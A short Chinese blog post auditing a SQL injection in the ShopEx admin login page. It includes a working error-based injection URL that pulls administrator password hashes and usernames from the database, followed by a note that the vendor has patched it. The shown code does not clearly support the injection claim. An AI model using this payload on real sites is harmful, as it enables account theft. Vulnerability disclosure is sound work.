代码审计:Shopex后台登录页面注入漏洞附利用P

  • A+
所属分类:Seay信息安全博客

显示不全请点击全屏阅读

对登录时传递的某参数未做过滤,导致注入的产生

最近做二次开发的时候看到了登录的流程
发现在文件\shopex\core\admin\controller\ctl.passport.php
处理了验证码,管理帐号和密码,但是在最底下发现一个sess_id

function certi_validate(){ 
        $cert = $this->system->loadModel('service/certificate'); 
        $sess_id = $_POST['session_id']; 
  
        $return = array(); 
        if($sess_id == $cert->get_sess()){ 
            $return = array( 
                'res' => 'succ', 
                'msg' => '', 
                'info' => ''
            ); 
  
            echo json_encode($return); 
        }else{ 
            $return = array( 
                'res' => 'fail', 
                'msg' => '000001', 
                'info' => 'You have the different session!'
            ); 
  
            echo json_encode($return); 
        } 
    }
没做处理。直接导致sql注入产生。还在学php,分析错的地方请指正

http://fuck.0day5.com/shopadmin/index.php?ctl=passport&act=login&sess_id=1
代码审计:Shopex后台登录页面注入漏洞附利用P
 
 
利用:
http://fuck.0day5.com/shopadmin/index.php?ctl=passport&act=login&sess_id=1'+and(select+1+from(select+count(*),concat((select+(select+(select+concat(userpass,0x7e,username,0x7e,op_id)+from+sdb_operators+Order+by+username+limit+0,1)+)+from+`information_schema`.tables+limit+0,1),floor(rand(0)*2))x+from+`information_schema`.tables+group+by+x)a)+and+'1'='1
顺带路径一起爆出来了

代码审计:Shopex后台登录页面注入漏洞附利用P

修复方案:

过滤,官方已经升级修复,请用户及时升级

作者:saline

 

 

Tags:

ShopEx漏洞, 代码审计,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡
代码审计:Shopex后台登录页面注入漏洞附利用P